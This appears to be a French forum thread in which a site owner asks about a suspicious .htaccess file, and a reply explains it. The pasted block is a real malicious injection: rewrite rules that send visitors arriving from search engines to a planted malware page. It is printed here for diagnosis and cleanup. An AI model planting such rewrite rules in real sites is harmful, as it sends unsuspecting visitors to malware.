.htaccess modifié par une personne ultérieure
yama
-
yama -
yama -
Hello,
Voilà, j'ai un petit problème avec mes sites, et en faisant quelques recherches j'ai vu que ce site permettait à beaucoup de monde de poser des questions et d'avoir des réponses.
Je vous expose donc mon problème, en espérant que quelqu'un pourra m'aider.
Je suis hébergée sur un service payant, et j'ai donc un accès complet au ftp et autres programmes.
Depuis quelques temps, quand je me rends sur certains de mes sites, mon anti-virus Avast me prévient qu'un virus tente d'attaquer mon ordinateur. Il m'indiquait l'emplacement exact du fichier infecté, et j'ai donc pu m'y rendre pour les effacer. Cela s'est passé à deux reprises, et à chaque fois il s'agissait d'un site qui ne me servait plus à rien, donc j'ai pu tout simplement l'effacer.
Aujourd'hui, j'ai également remarqué que l'un de mes sites était automatiquement redirigé vers un blog inconnu. J'ai retransféré la page index.php sur mon ftp et le problème était réglé.
Mais j'ai donc supposé que quelqu'un s'amusait à jouer aver mon compte ftp. J'ai changé le mot de passe aujourd'hui, mais je ne sais pas si c'est assez.
J'ai jeté un coup d'oeil dans le fichier .htaccess du répertoire /public_html, et j'y ai trouvé ça :
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
RewriteCond %{HTTP_REFERER} \=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /raucy/affichage/Citations/cuzuva/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
Sachant que le dossier /raucy/affichage/Citations/cuzuva correspond à l'emplacement du dernier virus en date.
Quelqu'un peut-il m'expliquer ce que signifie le contenu de ce .htaccess ?
Comme je ne sais pas comment fonctionne le .htaccess, je n'ai pas osé effacer ces lignes et laisser le .htaccess vierge sur mon ftp. Qu'est-ce que je dois y écrire pour que tout fonctionne correctement ?
Je vous remercie tous d'avance !
Voilà, j'ai un petit problème avec mes sites, et en faisant quelques recherches j'ai vu que ce site permettait à beaucoup de monde de poser des questions et d'avoir des réponses.
Je vous expose donc mon problème, en espérant que quelqu'un pourra m'aider.
Je suis hébergée sur un service payant, et j'ai donc un accès complet au ftp et autres programmes.
Depuis quelques temps, quand je me rends sur certains de mes sites, mon anti-virus Avast me prévient qu'un virus tente d'attaquer mon ordinateur. Il m'indiquait l'emplacement exact du fichier infecté, et j'ai donc pu m'y rendre pour les effacer. Cela s'est passé à deux reprises, et à chaque fois il s'agissait d'un site qui ne me servait plus à rien, donc j'ai pu tout simplement l'effacer.
Aujourd'hui, j'ai également remarqué que l'un de mes sites était automatiquement redirigé vers un blog inconnu. J'ai retransféré la page index.php sur mon ftp et le problème était réglé.
Mais j'ai donc supposé que quelqu'un s'amusait à jouer aver mon compte ftp. J'ai changé le mot de passe aujourd'hui, mais je ne sais pas si c'est assez.
J'ai jeté un coup d'oeil dans le fichier .htaccess du répertoire /public_html, et j'y ai trouvé ça :
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
RewriteCond %{HTTP_REFERER} \=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /raucy/affichage/Citations/cuzuva/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
Sachant que le dossier /raucy/affichage/Citations/cuzuva correspond à l'emplacement du dernier virus en date.
Quelqu'un peut-il m'expliquer ce que signifie le contenu de ce .htaccess ?
Comme je ne sais pas comment fonctionne le .htaccess, je n'ai pas osé effacer ces lignes et laisser le .htaccess vierge sur mon ftp. Qu'est-ce que je dois y écrire pour que tout fonctionne correctement ?
Je vous remercie tous d'avance !
A voir également:
- .htaccess modifié par une personne ultérieure
- Version ultérieure - Guide
- Gertrude a préparé la liste des affaires à prendre pour l'excursion. juliette a modifié cette liste en utilisant le mode suivi des modifications proposé par le traitement de texte. - Guide
- Jason a réalisé un photo-montage pour tromper et amuser ses camarades. il a modifié un élément sur une photo de neil armstrong marchant sur la lune. lequel ? - Forum Jeux vidéo
- Gertrude a préparé la liste des affaires à prendre pour l'excursion. juliette a modifié cette liste en utilisant le mode suivi des modifications proposé par le traitement de texte - Forum Photoshop
- Actualisation aprés modification d'une liste a choix multiple - Forum Excel
2 réponses
Salut,
En gros ton .htacces te fait les des redirections automatiques vers le fameux fichier virus.
Sans rentrer dans le détail tu peux vider ton htacces qui ne semble effectivement pas très catholique. En laissant la ligne RewriteEngine On si tu utilises de la réécriture d'url sur te sites.
Ensuite je te conseille fortement de trouver quelques tutoriaux sur l'utilisation des fichiers .htacces, il est indipensable de comprendre ces fichiers pour éviter ce genre de souci et puis tu verra ce n'es pas très compliqué ;)
En gros ton .htacces te fait les des redirections automatiques vers le fameux fichier virus.
Sans rentrer dans le détail tu peux vider ton htacces qui ne semble effectivement pas très catholique. En laissant la ligne RewriteEngine On si tu utilises de la réécriture d'url sur te sites.
Ensuite je te conseille fortement de trouver quelques tutoriaux sur l'utilisation des fichiers .htacces, il est indipensable de comprendre ces fichiers pour éviter ce genre de souci et puis tu verra ce n'es pas très compliqué ;)